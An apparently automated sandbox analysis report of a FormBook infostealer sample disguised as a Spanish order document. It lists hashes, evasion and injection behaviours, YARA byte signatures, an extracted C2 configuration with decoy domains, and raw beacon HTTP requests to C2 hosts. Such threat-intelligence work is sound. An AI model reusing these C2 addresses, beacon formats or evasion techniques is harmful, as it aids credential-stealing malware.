Windows Analysis Report Nuevo Pedido.exe

Overview

General Information

Sample Name: Nuevo Pedido.exe
Analysis ID: 528617
MD5: 159c46c59cd8ecb7a2bce707de1bc370
SHA1: e76f6dc42b06e706b6ce49cf6c95c9eaabfc9334
SHA256: 7f91403a34cde3f8a1d3a30a2cec9abfb30f5f7eb52f777af78fa0d34f7a27f9
Tags: exe, Formbook, xloader

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Self deletion via cmd delete
.NET source code contains potential unpacker
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • Nuevo Pedido.exe (PID: 6320 cmdline: "C:\Users\user\Desktop\Nuevo Pedido.exe" MD5: 159C46C59CD8ECB7A2BCE707DE1BC370)
    • Nuevo Pedido.exe (PID: 6464 cmdline: C:\Users\user\Desktop\Nuevo Pedido.exe MD5: 159C46C59CD8ECB7A2BCE707DE1BC370)
      • explorer.exe (PID: 3472 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cscript.exe (PID: 6536 cmdline: C:\Windows\SysWOW64\cscript.exe MD5: 00D3041E47F99E48DD5FFFEDF60F6304)
          • cmd.exe (PID: 6420 cmdline: /c del "C:\Users\user\Desktop\Nuevo Pedido.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.spoiledzone.com/udeh/"], "decoy": ["pimpyoursmile.com", "mibikeshops.com", "blueprintroslyn.com", "onlinedatingthaiweb.com", "filmweltruhr.com", "apprigutimaunrpgroup.com", "prolineautoservices.com", "thejohnmatt.com", "predialisbolivia.com", "pittsburghdata.center", "janeflwr.com", "usxigroup.com", "canurfaliogli.net", "securebankofamericalog.site", "concernedclimatecitizen.com", "756256.xyz", "blaclyteproductions.com", "chaturey.com", "mesoftbilisim.com", "crochetastitch.com", "biggirlrantz.com", "trenddoffical.com", "eureka.quest", "syuanbao.com", "auspicious.tech", "mypc.host", "hemeishun.com", "3973rollingvalleydrive.com", "lovebydarius.store", "z1liner.com", "pspoint.com", "skincell-advanced.website", "937281.com", "mygranitepro.com", "masterlotz.com", "electricidadygasmx.com", "mmcyxx.com", "fixmetech.com", "teesworkshop.com", "topshelfbudshop.com", "ccnet.club", "myfranciscanshoe.com", "kyrstensinema2024.com", "selectioncoeur.com", "nrgd1.club", "qzttb.net", "ouidles.com", "royaldears.com", "downingmunroe.online", "seawooenc.com", "flagfootballcoaches.com", "tremblock.com", "finsits.com", "rcepjobs.com", "web-control.biz", "notvaccinatedjobs.com", "glueandstack.com", "modularbuildingsolutions.net", "sosibibyslot.website", "dragonmodz.net", "turkishdelightday.xyz", "dentalhealth24.com", "celtabet153.xyz", "pigsandbees.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000003.00000002.304758888.0000000001500000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000003.00000002.304758888.0000000001500000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000003.00000002.304758888.0000000001500000.00000040.00020000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x16ad9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bec:$sqlite3step: 68 34 1C 7B E1
    • 0x16b08:$sqlite3text: 68 38 2A 90 C5
    • 0x16c2d:$sqlite3text: 68 38 2A 90 C5
    • 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
00000010.00000002.500385499.0000000000A10000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000010.00000002.500385499.0000000000A10000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Unpacked PEs

Source | Rule | Description | Author | Strings
3.0.Nuevo Pedido.exe.400000.8.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
3.0.Nuevo Pedido.exe.400000.8.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
        • 0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7ba2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x138b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x133a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x139b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x85ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1261c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9332:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18da7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19e4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
3.0.Nuevo Pedido.exe.400000.8.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
        • 0x15cd9:$sqlite3step: 68 34 1C 7B E1
        • 0x15dec:$sqlite3step: 68 34 1C 7B E1
        • 0x15d08:$sqlite3text: 68 38 2A 90 C5
        • 0x15e2d:$sqlite3text: 68 38 2A 90 C5
        • 0x15d1b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15e43:$sqlite3blob: 68 53 D8 7F 8C
0.2.Nuevo Pedido.exe.2dd8e9c.1.raw.unpack | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security
3.0.Nuevo Pedido.exe.400000.8.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 00000003.00000002.304758888.0000000001500000.00000040.00020000.sdmp | Malware Configuration Extractor: FormBook {"C2 list": ["www.spoiledzone.com/udeh/"], "decoy": ["pimpyoursmile.com", "mibikeshops.com", "blueprintroslyn.com", "onlinedatingthaiweb.com", "filmweltruhr.com", "apprigutimaunrpgroup.com", "prolineautoservices.com", "thejohnmatt.com", "predialisbolivia.com", "pittsburghdata.center", "janeflwr.com", "usxigroup.com", "canurfaliogli.net", "securebankofamericalog.site", "concernedclimatecitizen.com", "756256.xyz", "blaclyteproductions.com", "chaturey.com", "mesoftbilisim.com", "crochetastitch.com", "biggirlrantz.com", "trenddoffical.com", "eureka.quest", "syuanbao.com", "auspicious.tech", "mypc.host", "hemeishun.com", "3973rollingvalleydrive.com", "lovebydarius.store", "z1liner.com", "pspoint.com", "skincell-advanced.website", "937281.com", "mygranitepro.com", "masterlotz.com", "electricidadygasmx.com", "mmcyxx.com", "fixmetech.com", "teesworkshop.com", "topshelfbudshop.com", "ccnet.club", "myfranciscanshoe.com", "kyrstensinema2024.com", "selectioncoeur.com", "nrgd1.club", "qzttb.net", "ouidles.com", "royaldears.com", "downingmunroe.online", "seawooenc.com", "flagfootballcoaches.com", "tremblock.com", "finsits.com", "rcepjobs.com", "web-control.biz", "notvaccinatedjobs.com", "glueandstack.com", "modularbuildingsolutions.net", "sosibibyslot.website", "dragonmodz.net", "turkishdelightday.xyz", "dentalhealth24.com", "celtabet153.xyz", "pigsandbees.com"]}
Multi AV Scanner detection for submitted file
Source: Nuevo Pedido.exe | Virustotal: Detection: 32%
Source: Nuevo Pedido.exe | ReversingLabs: Detection: 33%
Yara detected FormBook
Source: Yara match | File source: 3.0.Nuevo Pedido.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.0.Nuevo Pedido.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.Nuevo Pedido.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.0.Nuevo Pedido.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.Nuevo Pedido.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.0.Nuevo Pedido.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.0.Nuevo Pedido.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.304758888.0000000001500000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.500385499.0000000000A10000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.304729594.00000000014C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.242262290.0000000003F97000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000000.238813583.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.291355057.000000000B790000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.304467099.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.499912414.0000000000700000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.499680776.0000000000600000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000000.239252489.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.273788531.000000000B790000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.241987821.0000000003D7D000.00000004.00000001.sdmp, type: MEMORY
Source: 3.0.Nuevo Pedido.exe.400000.8.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 3.2.Nuevo Pedido.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 3.0.Nuevo Pedido.exe.400000.4.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 3.0.Nuevo Pedido.exe.400000.6.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: Nuevo Pedido.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: Nuevo Pedido.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: cscript.pdbUGP | source: Nuevo Pedido.exe, 00000003.00000002.309749696.0000000003460000.00000040.00020000.sdmp, Nuevo Pedido.exe, 00000003.00000002.304821141.0000000001559000.00000004.00000020.sdmp
Source: Binary string: wntdll.pdbUGP | source: Nuevo Pedido.exe, 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Nuevo Pedido.exe, 00000003.00000002.308818280.0000000001AAF000.00000040.00000001.sdmp, cscript.exe, 00000010.00000002.506569206.000000000486F000.00000040.00000001.sdmp, cscript.exe, 00000010.00000002.503908034.0000000004750000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb | source: Nuevo Pedido.exe, Nuevo Pedido.exe, 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Nuevo Pedido.exe, 00000003.00000002.308818280.0000000001AAF000.00000040.00000001.sdmp, cscript.exe, cscript.exe, 00000010.00000002.506569206.000000000486F000.00000040.00000001.sdmp, cscript.exe, 00000010.00000002.503908034.0000000004750000.00000040.00000001.sdmp
Source: Binary string: cscript.pdb | source: Nuevo Pedido.exe, 00000003.00000002.309749696.0000000003460000.00000040.00020000.sdmp, Nuevo Pedido.exe, 00000003.00000002.304821141.0000000001559000.00000004.00000020.sdmp
Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 4x nop then pop edi
Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 4x nop then pop esi
Source: C:\Users\user\Desktop\Nuevo Pedido.exe | Code function: 4x nop then pop esi
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 4x nop then pop esi
Source: C:\Windows\SysWOW64\cscript.exe | Code function: 4x nop then pop esi

Networking:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe | Domain query: www.rcepjobs.com
Source: C:\Windows\explorer.exe | Domain query: www.sosibibyslot.website
Source: C:\Windows\explorer.exe | Network Connect: 185.53.179.91 80
Source: C:\Windows\explorer.exe | Domain query: www.tremblock.com
Source: C:\Windows\explorer.exe | Domain query: www.securebankofamericalog.site
Source: C:\Windows\explorer.exe | Domain query: www.thejohnmatt.com
Source: C:\Windows\explorer.exe | Network Connect: 3.64.163.50 80
Source: C:\Windows\explorer.exe | Domain query: www.blueprintroslyn.com
Source: C:\Windows\explorer.exe | Domain query: www.onlinedatingthaiweb.com
Source: C:\Windows\explorer.exe | Network Connect: 192.232.250.147 80
Source: C:\Windows\explorer.exe | Network Connect: 185.53.178.53 80
Source: C:\Windows\explorer.exe | Domain query: www.downingmunroe.online
Source: C:\Windows\explorer.exe | Network Connect: 209.17.116.163 80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: www.spoiledzone.com/udeh/
Source: Joe Sandbox View | ASN Name: TEAMINTERNET-ASDE TEAMINTERNET-ASDE
Source: Joe Sandbox View | ASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
Source: global traffic | HTTP traffic detected: GET /udeh/?2dYxhfjx=E9wG6DB+gJGrCrA7N2npAfbzd/MNcvRP0YSWLCgDnz2mMEe2tMuLmGDUaa3MX32MwTcI&s6AD=5jltOBY8-rN HTTP/1.1 | Host: www.tremblock.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /udeh/?2dYxhfjx=Sh2Frx7Ne5Gbf0GZF0aHN0EyZlj99LhHOr4v0jLu0VOTkpyLoQ3tHVxja8cQ+qoaRshC&s6AD=5jltOBY8-rN HTTP/1.1 | Host: www.rcepjobs.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /udeh/?2dYxhfjx=XsaaYVs5B+09RIkVBuB9uz7A4nUjKuiPTgX8t5JQ0XDGnKq9QQr8GjRKS5XBt9MDEtTg&s6AD=5jltOBY8-rN HTTP/1.1 | Host: www.downingmunroe.online | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /udeh/?2dYxhfjx=ov0JDamFDTMX/NINQ6dXBWp9D4Bna97YEIhf43toIE+QttJEvvSyuVruiBSF6Ny2F/6R&s6AD=5jltOBY8-rN HTTP/1.1 | Host: www.thejohnmatt.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /udeh/?2dYxhfjx=WESqUOlrd4N7F4Vkh8SPM0KezyJ+WDn1u3Qqm333AtEi2E+6MV6LR8TxaNrvEi0KysNf&s6AD=5jltOBY8-rN HTTP/1.1 | Host: www.onlinedatingthaiweb.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View | IP Address: 3.64.163.50 3.64.163.50
Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx | Date: Thu, 25 Nov 2021 14:10:30 GMT | Content-Type: text/html | Content-Length: 146 | Connection: close | Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a | Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
Source: global traffic | HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx | Date: Thu, 25 Nov 2021 14:11:10 GMT | Content-Type: text/html | Content-Length: 146 | Connection: close | Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a | Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
Source: Nuevo Pedido.exe, 00000000.00000002.241689369.0000000002E3A000.00000004.00000001.sdmp, Nuevo Pedido.exe, 00000000.00000002.241535390.0000000002D71000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: cscript.exe, 00000010.00000002.508075136.0000000004E02000.00000004.00020000.sdmp | String found in binary or memory: http://www.rcepjobs.com
Source: unknown | DNS traffic detected: queries for: www.tremblock.com

E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File source: 3.0.Nuevo Pedido.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.0.Nuevo Pedido.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.Nuevo Pedido.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.0.Nuevo Pedido.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.Nuevo Pedido.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.0.Nuevo Pedido.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.0.Nuevo Pedido.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.304758888.0000000001500000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.500385499.0000000000A10000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.304729594.00000000014C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.242262290.0000000003F97000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000000.238813583.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.291355057.000000000B790000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.304467099.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.499912414.0000000000700000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.499680776.0000000000600000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000000.239252489.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.273788531.000000000B790000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.241987821.0000000003D7D000.00000004.00000001.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)
Source: 3.0.Nuevo Pedido.exe.400000.8.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.0.Nuevo Pedido.exe.400000.8.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 3.0.Nuevo Pedido.exe.400000.8.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.0.Nuevo Pedido.exe.400000.8.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 3.2.Nuevo Pedido.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.Nuevo Pedido.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 3.0.Nuevo Pedido.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.0.Nuevo Pedido.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 3.2.Nuevo Pedido.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.Nuevo Pedido.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 3.0.Nuevo Pedido.exe.400000.6.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.0.Nuevo Pedido.exe.400000.6.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 3.0.Nuevo Pedido.exe.400000.6.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.0.Nuevo Pedido.exe.400000.6.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.304758888.0000000001500000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.304758888.0000000001500000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000010.00000002.500385499.0000000000A10000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000010.00000002.500385499.0000000000A10000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.304729594.00000000014C0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.304729594.00000000014C0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.242262290.0000000003F97000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.242262290.0000000003F97000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000003.00000000.238813583.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000000.238813583.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.291355057.000000000B790000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.291355057.000000000B790000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.304467099.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.304467099.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000010.00000002.499912414.0000000000700000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000010.00000002.499912414.0000000000700000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000010.00000002.499680776.0000000000600000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000010.00000002.499680776.0000000000600000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000003.00000000.239252489.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000000.239252489.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.273788531.000000000B790000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.273788531.000000000B790000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.241987821.0000000003D7D000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.241987821.0000000003D7D000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: Nuevo Pedido.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
